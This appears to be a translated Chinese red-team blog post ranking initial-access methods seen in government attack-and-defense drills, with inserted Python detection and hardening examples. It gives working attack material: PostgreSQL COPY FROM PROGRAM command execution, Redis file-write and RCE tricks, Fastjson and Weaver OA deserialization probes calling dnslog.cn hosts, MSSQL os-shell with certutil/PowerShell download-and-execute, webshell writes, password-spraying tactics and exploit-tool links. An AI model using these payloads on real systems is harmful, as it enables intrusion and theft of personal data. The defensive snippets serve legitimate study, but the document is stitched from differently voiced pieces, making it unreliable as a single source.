
Preface
(The perspective may be narrow and there are omissions and mistakes; seniors, please be forgiving.)
【View information】
Author: 0ne
The data in this article comes from the compromise reports of 18+ provincial- and municipal-level HVV drills covering 90+ units (partly from the author's own participation, partly from reports by other colleagues at the company). The approach is simple: phishing and earth-shattering 0days are not included.

Statistical chart of breakthrough entry-point methods:

Scoring in an attack-and-defense drill only looks at two things: permissions and data. Permission types are divided into system permissions and application permissions, and permission levels into administrator and ordinary user. Data is generally the "four-piece set": name, mobile phone number, ID card number and address. That is the usual definition of sensitive data, but it can differ with the application at hand; in a hospital system, for example, medical case information is sensitive data as well.
Based on the statistics above, some of the methods are explained in order of frequency, from high to low.
Weak password [web application]
Weak passwords are a vulnerability that can never be fully fixed; every attack-and-defense drill has an opening torn by a weak password (29 occurrences).
This section covers weak passwords on web applications; the PostgreSQL / Redis / VPN / Jenkins / admin weak passwords counted in the statistics are excluded here.
Speaking of weak passwords, brute-forcing technique has to be mentioned. Before brute forcing, try to bypass the captcha: some captchas are not refreshed, or have verification-logic errors that can be bypassed. The forgot-password function usually has a username enumeration vulnerability. For the username dictionary, guess short names or employee IDs according to the system at hand, or make a reasonable guess from the JS regexes of the login box or from Google searches. When the user base is large, traversing usernames with a fixed weak password is usually the best approach. Having obtained back-end login password MD5s through SQL injection many times and cracked them, the probability is not small that the admin password is the domain-name abbreviation or system abbreviation + @ + year, or some related abbreviation. For example: a fire protection system / bjtuxfk [XXXX fire department]; the back end of a women's federation / [email protected].
Handy dictionaries:
https://github.com/fuzz-security/SuperWordlist
https://github.com/gh0stkey/Web-Fuzzing-Box
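The fixed-password, rotating-username pattern described above is the one a defender should alert on, because per-account lockouts never trigger on it. As an added example (not from the original article), a Python detector run over constructed login-log lines; the log format, field names and thresholds are assumptions:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed web-application login events (not real data): one source walks
# through many usernames with one attempt each, another hammers one account.
SAMPLE_LOG = """\
2021-05-10T09:00:01 src=203.0.113.7 user=zhangsan result=FAIL
2021-05-10T09:00:02 src=203.0.113.7 user=lisi result=FAIL
2021-05-10T09:00:03 src=203.0.113.7 user=wangwu result=FAIL
2021-05-10T09:00:04 src=203.0.113.7 user=zhaoliu result=FAIL
2021-05-10T09:00:05 src=203.0.113.7 user=sunqi result=FAIL
2021-05-10T09:00:06 src=203.0.113.7 user=zhouba result=OK
2021-05-10T09:03:00 src=198.51.100.2 user=admin result=FAIL
2021-05-10T09:03:10 src=198.51.100.2 user=admin result=FAIL
2021-05-10T09:03:20 src=198.51.100.2 user=admin result=OK
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<res>\S+)$")


def parse_events(log_text):
    """Return (timestamp, src, user, result) tuples; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["res"]))
    return events


def detect_spraying(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Flag sources that, inside `window`, tried at least `min_users` distinct
    usernames with no more than `max_per_user` attempts each. The single-account
    brute force from 198.51.100.2 is deliberately NOT matched: lockout covers it."""
    by_src = defaultdict(list)
    for ts, src, user, res in events:
        by_src[src].append((ts, user, res))
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - start <= window]
            per_user = defaultdict(int)
            for _, user, _ in in_window:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                findings[src] = {"users": sorted(per_user),
                                 "success": any(r == "OK" for _, _, r in in_window)}
                break
    return findings
```

The `success` flag marks the case that matters most in a drill: one of the sprayed accounts actually accepted the fixed password.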
Weak password [other]
Database weak passwords were only encountered on PostgreSQL / Redis. Other databases in common use get attention; the rest, ops may not even know are running.
PostgreSQL (versions 9.3 to 11.2) arbitrary command execution vulnerability (CVE-2019-9193):
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
Redis
After connecting, run INFO to view server information [Redis version and OS]:
Redis 4.x/5.x RCE
https://github.com/Dliv3/redis-rogue-server
https://github.com/0671/RedisModules-ExecuteCommand-for-Windows
Linux
Write a scheduled task (cron), write an SSH public key, write a webshell [web path known]
Windows
Write a startup item, write a webshell [web path known]
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
https://github.com/r35tart/RedisWriteFile
To be honest, I haven't run into Windows. With sufficient permissions, write the startup item first and then try to get it to restart [just imagining, never actually tried QAQ].
These two Windows & Redis articles are quite detailed:
https://xz.aliyun.com/t/8153
https://xz.aliyun.com/t/7940
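Every Redis trick above (CONFIG SET dir/dbfilename for the file writes, MODULE LOAD for the 4.x/5.x rogue server) depends on an instance that is reachable, unauthenticated and still has those commands enabled. As an added example, not from the original article, a Python audit of constructed redis.conf fragments; the directive names are real Redis settings, the fragments and the passphrase are made up:

```python
# Constructed redis.conf fragments (not taken from any real host). The weak one
# is what the Linux/Windows write-file tricks above rely on.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
# requirepass foobared
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass constructed-example-passphrase-change-me
rename-command CONFIG ""
rename-command MODULE ""
dir /var/lib/redis
"""

# CONFIG SET dir/dbfilename enables the file writes, MODULE LOAD the 4.x/5.x RCE.
DANGEROUS_COMMANDS = ("CONFIG", "MODULE")


def parse_conf(text):
    """Map lower-cased directive -> list of argument strings (comments skipped)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit_redis_conf(text):
    """Return a list of finding strings; an empty list means every check passed."""
    conf = parse_conf(text)
    findings = []
    bind_tokens = " ".join(conf.get("bind", [])).split()
    if not bind_tokens or any(t in ("0.0.0.0", "::", "*") for t in bind_tokens):
        findings.append("bind: reachable on all interfaces")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not conf.get("requirepass"):
        findings.append("requirepass: not set, unauthenticated access")
    # A command renamed to anything (including "" = disabled) counts as mitigated.
    renamed = {a.split()[0].upper() for a in conf.get("rename-command", []) if a.split()}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} still reachable under its default name")
    return findings
```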
VPN weak password
For webvpn the user base is large, and weak passwords can be sprayed with a fixed password against student IDs and employee IDs. The VPN weak password in the case belonged to a client that had to be downloaded; the password does not look guessed, more like information leaked via Google / git, or the employee's mobile number looked up in leaked-data databases and pieced together from the information there [personal guess].
Jenkins weak password
The script console in the back end can execute commands; download-and-execute via LOLBAS needs no explanation.
Admin weak password
MySQL writing a webshell needs no explanation.
Shiro deserialization
Shiro, forever god! Without Shiro I wouldn't know how to get a foothold (28 occurrences).
Over the past two years Shiro deserialization has arguably been the number-one exploited vulnerability in attack-and-defense drills. Whether it is the asset collection platform developed in-house or the excellent ShuiZe project on GitHub, both carry Shiro fingerprinting. Finding Shiro targets is also very simple: spread from domain name to subdomains to IPs to full port range, import those URLs into a Shiro identification tool, run it, and repeat. Of the 28 Shiro cases counted, 27 were collected through OneForAll or FOFA, and one was found via a WeChat official account.
Handy tools:
https://github.com/pmiaowu/BurpShiroPassiveScan
https://github.com/wyzxxz/shiro_rce_tool
https://github.com/j1anFen/shiro_attack
Arbitrary file upload [general]
Plain and unadorned (10 occurrences)
In general, the fastest way to get a shell is to find an upload. Quickly verify whether the upload is validated by a back-end allowlist; if it cannot be resolved in the back end or combined with other vulnerabilities, drop it from the list. Note that when testing whether the upload uses a blacklist or an allowlist, the uploaded content should be harmless, otherwise the WAF may interfere: we must know whether the upload failed because of the program's own restriction or because the WAF blocked it. Do not fuzz the upload interface; it is all thunder and no rain.
Worth mentioning: of the 10 uploads counted, one was in a WeChat mini program, one was an upload interface exposed through Swagger information disclosure, and one was in a bank's online chat system, where clicking the "human agent" button made an image-sending button appear.
Customer service system:

There is another case:
Get into the back end, upload files through KindEditor, and manage files through XXXX, which has a rename function: rename to .php, getshell.
The essence of bypassing a WAF on file upload is the difference between how the server and the WAF parse the packet. Here are several abnormal packets:
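The back-end allowlist the section above tells you to test for, together with the rename-to-.php case, as an added Python example (not from the original article). The accepted types, magic bytes and function names are assumptions made for the example:

```python
import os

# Allowlist of extensions and the magic bytes each must start with (constructed
# table for the example; extend it to the types your application really accepts).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def allowed_extension(filename):
    """Return the lower-cased extension if the whole name passes the allowlist,
    else None. Normalises path separators, rejects NUL bytes, trailing dots or
    spaces, and any name with more than one dot (shell.php.jpg, shell.jpg.php)."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name or name != name.rstrip(". "):
        return None
    stem, sep, ext = name.lower().rpartition(".")
    if not sep or not stem or "." in stem:
        return None
    return ext if ext in ALLOWED else None


def validate_upload(filename, content):
    """Server-side check: extension allowlist first, then content sniffing, so a
    .jpg whose bytes are script text is refused even though the name is fine."""
    ext = allowed_extension(filename)
    if ext is None:
        return False, "extension not in allowlist"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match declared type"
    return True, ext


def validate_rename(old_name, new_name):
    """The KindEditor case above is exactly this check missing: a file that passed
    validation as an image must not become executable through a rename."""
    return allowed_extension(old_name) is not None and allowed_extension(new_name) is not None
```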

Fastjson deserialization
Handy (6 occurrences)
Determine whether it is Fastjson: an error message, a thrown exception, or DNSlog:
{"rand1":{"@type":"java.net.InetAddress","val":"gbi7ge.dnslog.cn"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"gbi7ge.dnslog.cn"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"gbi7ge.dnslog.cn"}}
When there is a WAF:
Hex encoding or \B:

See:
https://www.sec-in.com/article/950
https://xz.aliyun.com/t/7568
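The detection probes and the WAF-evading encodings above have a defender-side counterpart: normalise escapes before matching, the way the parser does, instead of matching raw bytes. An added Python example (not from the original article) over constructed request bodies; the probe domain is a placeholder:

```python
import re

# Constructed request bodies (not real captures). The first has the probe shape
# shown above; the next two write the same key with JSON \u escapes and with the
# \x escapes that Fastjson's string scanner also accepts; the last is benign.
SAMPLES = [
    '{"rand1":{"@type":"java.net.InetAddress","val":"probe.example.invalid"}}',
    '{"rand2":{"\\u0040type":"java.net.Inet4Address","val":"probe.example.invalid"}}',
    '{"rand3":{"\\x40\\x74\\x79\\x70\\x65":"java.net.Inet6Address","val":"probe.example.invalid"}}',
    '{"name":"alice","email":"alice@type.example.invalid"}',
]

ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
# A quoted @type key followed by a colon and a quoted class name.
AUTOTYPE_KEY_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')


def decode_escapes(body):
    """Fold \\uXXXX and \\xXX escapes into the characters the parser will see.
    A WAF rule that greps the raw bytes for "@type" never sees this form, which
    is why the hex-encoded payloads above get through it."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), body)


def find_autotype(body):
    """Return the class named by an @type key after decoding, or None."""
    m = AUTOTYPE_KEY_RE.search(decode_escapes(body))
    return m.group(1) if m else None


def scan_bodies(bodies):
    """Map body index -> @type class for every body that carries one."""
    found = {}
    for i, body in enumerate(bodies):
        cls = find_autotype(body)
        if cls:
            found[i] = cls
    return found
```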
Handy tools:
https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/wyzxxz/fastjson_rce_tool
https://github.com/feihong-cs/JNDIExploit
Disclosure of sensitive information
No matter how small the fly, it is still meat (5 occurrences).
Hospitals are the most common case: WeChat official accounts or mini programs that let you enumerate medical case data:


Querying an interface constructed from Swagger information disclosure was also encountered:


UEditor 1.4.3 arbitrary file upload
Surprise (5 occurrences)
When you meet a .NET site, right-click to view an image and the URL is /ueditor/upload/image/[date in yyyyMMdd format, e.g. 20200101]/[25 digits].png, you can judge that the site uses UEditor [a directory scanning tool also works], so splice the path ~/net/controller.ashx:
The part before ~ may not be fixed; look for it in the JS or make a reasonable guess.
Worth mentioning: I once met a site where png?.aspx returned 404 but png.aspx worked directly. Does UEditor filter this? When a WAF is present, use as appropriate.

MSSQL stacked injection
Basic operations:
--os-shell gives you a command line; usually download-and-execute with certutil or launch PowerShell directly. You can also write a webshell:
Find the physical path of static resources:
for /r C:\ %i in (*xxx*) do @echo %i
dir /s/a-d/b C:\*xxx.xxx
echo ^<[one-liner]^> > C:\phpstudy_pro\WWW\shell.txt
Be careful to escape < and > with ^.
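Both the PostgreSQL COPY ... FROM PROGRAM snippet earlier and the --os-shell / certutil / PowerShell chain here leave a distinctive statement in database logs. As an added example (not from the original article) serving both sections, a Python detector run over constructed log lines; the log layout, rule names and placeholder commands are assumptions:

```python
import re

# Constructed statement-log lines (not real captures): PostgreSQL lines in a
# '%m [%p] %u@%d' log_line_prefix style, and MSSQL statements as an audit or
# Extended Events export would show them. Only the statement text is inspected.
SAMPLE_LOG = [
    "2021-05-10 09:00:01 [1234] app@erp LOG:  statement: select * from orders where id = 5",
    "2021-05-10 09:00:02 [1234] app@erp LOG:  statement: COPY cmd_exec FROM PROGRAM 'whoami'",
    "2021-05-10 09:00:03 [1234] app@erp LOG:  statement: COPY cmd_exec FROM '/tmp/data.csv'",
    "exec sp_configure 'xp_cmdshell', 1; reconfigure;",
    "EXEC master..xp_cmdshell 'certutil <download args placeholder>'",
    "exec xp_cmdshell 'powershell <placeholder>'",
    "select name from sys.tables",
]

# (label, regex over the statement text); case-insensitive, whitespace tolerant.
RULES = [
    ("pg_copy_program", re.compile(r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\b", re.I | re.S)),
    ("mssql_xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("mssql_enable_xp_cmdshell", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
]
# Download-and-execute helpers the section names; their presence raises severity.
DOWNLOADERS = re.compile(r"\b(certutil|powershell|bitsadmin)\b", re.I)


def classify(statement):
    """Return [(rule, high_severity)] for one statement, [] if clean. COPY PROGRAM
    needs superuser or pg_execute_server_program, and enabling xp_cmdshell needs
    server-level ALTER SETTINGS, so a hit from an app account means it is over-privileged."""
    hits = []
    for label, rx in RULES:
        if rx.search(statement):
            hits.append((label, bool(DOWNLOADERS.search(statement))))
    return hits


def scan(lines):
    """Return {line_index: hits} for every line that matched at least one rule."""
    out = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            out[i] = hits
    return out
```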


OA system
Nothing to say: 0day smashing 0day.
Weaver OA, Seeyon OA, Tongda OA, Yonyou NC
GitHub searches, internal accumulation; undisclosed exploitation points are the best.
The two Weaver OA cases used WorkflowServiceXml deserialization, which went relatively smoothly.
Check whether it is present:
POST /services%20/WorkflowServiceXml HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 523
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest>
<web:string>
<map>
<entry>
<url>http://m5alw5.dnslog.cn</url>
<string>http://m5alw5.dnslog.cn</string>
</entry>
</map>
</web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>

Miscellaneous
Rambling
Getting sensitive data through SQL injection is unremarkable. Remember to add --random-agent to sqlmap.
S2 (Struts2) is seen less often on the internet, and I don't know how the boss got past the WAF.
A historical backdoor (a 404 JSP page) becoming an entry point is also outrageous.
All kinds of debug information leaks; import the cloud keys into a cloud management tool and prove the permissions.
Already rambling.
Digression
Pick the soft persimmon to squeeze
Web foothold work is about efficiency: pick the soft persimmon. Given a site, spending half a day before discovering "eh, there's an upload / Shiro / Fastjson" delays our work. Be purposeful, reduce trial and error, and do less useless work.
Finally
Follow me! Continuously updated; message me for access 【Network security learning materials · Getting started】